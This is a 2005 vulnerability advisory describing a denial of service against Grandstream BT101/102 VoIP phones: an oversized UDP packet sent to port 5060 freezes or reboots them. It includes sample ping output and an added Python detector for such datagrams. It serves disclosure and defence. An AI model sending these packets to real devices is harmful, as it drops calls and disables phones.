It is possible to cause a denial of service on the Grandstream Budge Tone 101/102 VoIP phone by sending a UDP packet greater than 65534 bytes to port 5060.
-------------------------------------------------------------------
SySS-Advisory: Grandstream Budge Tone 101/102 DoS Vulnerability
-------------------------------------------------------------------
Problem discovered: July 20th 2005
Vendor contacted: July 21st 2005
Advisory will be published on: August 12th 2005
AUTHOR: Pierre Kroma (kroma@syss.de)
SySS GmbH
72070 Tuebingen / Germany
Tel.: +49-7071-407856-0
Key fingerprint = 927A B13E 16F5 BBAB 8F17 75EB D8E1 A9A4 F257 4EEC
DEVICE: Grandstream Budge Tone-101
Grandstream Budge Tone-102
AFFECTED VERSIONS: perhaps all(?) <= 1.0.6.7 (firmware 1.0.6.7 tested)
EXPLOIT: attached
VENDOR STATUS: informed
SEVERITY: medium
Remotely exploitable: yes
DESCRIPTION:
It is possible to initiate a DoS attack against this VoIP
(hardware) phone. If you send a UDP packet greater than 65534 bytes
to port 5060, the device stops working:
- any active telephone call will be aborted.
- the display will show nothing / the display freezes.
- the integrated HTTP-server won't be reachable any more.
To solve the problem, you must switch the phone off and on again.
If you send a packet of exactly 65534 bytes the device may reboot.
Smaller packets have no effect.
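Added example, not part of the SySS advisory: one way to spot such datagrams in a packet capture. A datagram this large always arrives IP-fragmented, so the code tracks the highest byte offset seen per fragment group and flags UDP traffic to port 5060 whose reassembled size reaches 65534 bytes. It assumes the advisory's byte counts mean the total IPv4 datagram size; the function names and the sample addresses are constructed for illustration.

```python
import struct

SIP_PORT = 5060
LIMIT = 65534  # size named in the advisory; assumed to be the total IPv4 datagram length
IP_HDR = "!BBHHHBBH4s4s"

def parse_ipv4(pkt):
    """Return (flow key, header length, fragment offset, data length, UDP dst port or None)."""
    ver_ihl, _, total_len, ident, frag, _, proto, _, src, dst = struct.unpack(IP_HDR, pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    offset = (frag & 0x1FFF) * 8  # fragment offset is stored in 8-byte units
    dport = None
    if proto == 17 and offset == 0 and len(pkt) >= ihl + 4:
        dport = struct.unpack("!H", pkt[ihl + 2:ihl + 4])[0]  # UDP header is in the first fragment only
    return (src, dst, ident, proto), ihl, offset, total_len - ihl, dport

def find_oversized(packets, limit=LIMIT, port=SIP_PORT):
    """Return [(src, dst, size)] for UDP datagrams to `port` whose reassembled size reaches `limit`."""
    flows, alerted, alerts = {}, set(), []
    for pkt in packets:
        key, ihl, offset, dlen, dport = parse_ipv4(pkt)
        if key[3] != 17:  # not UDP
            continue
        st = flows.setdefault(key, {"dport": None, "hdr": 20, "end": 0})
        if dport is not None:
            st["dport"], st["hdr"] = dport, ihl
        st["end"] = max(st["end"], offset + dlen)  # highest byte seen, in any arrival order
        size = st["hdr"] + st["end"]
        if st["dport"] == port and size >= limit and key not in alerted:
            alerted.add(key)
            alerts.append((".".join(map(str, key[0])), ".".join(map(str, key[1])), size))
    return alerts

def sample_capture(src, dst, ident, dport, udp_len, step=1480):
    """Constructed input: header-only records for the fragments of one UDP datagram of
    `udp_len` bytes (UDP header included), as a short-snaplen capture would store them."""
    records = []
    for off in range(0, udp_len, step):
        dlen = min(step, udp_len - off)
        more = 0x2000 if off + dlen < udp_len else 0
        hdr = struct.pack(IP_HDR, 0x45, 0, 20 + dlen, ident, more | (off // 8),
                          64, 17, 0, bytes(src), bytes(dst))
        udp = struct.pack("!HHHH", 40000, dport, udp_len, 0) if off == 0 else b""
        records.append(hdr + udp)
    return records

if __name__ == "__main__":
    capture = sample_capture((198, 51, 100, 7), (192, 0, 2, 20), 1, SIP_PORT, 65515)
    print(find_oversized(capture))
```

Because the size is computed from the IP header fields rather than from the captured bytes, the check also works on captures that were truncated to headers.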
############################################################################
EXAMPLE:
Grandstream BT101/BT102 DoS
written by pierre kroma (kroma@syss.de)
ping the remote device xxx.xxx.xxx.xxx
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=1 ttl=250 time=0.479 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=2 ttl=250 time=0.406 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3 ttl=250 time=0.404 ms
--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev = 0.404/0.429/0.479/0.042 ms
Wait ...
ping the remote device xxx.xxx.xxx.xxx again
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.
--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 1999ms
############################################################################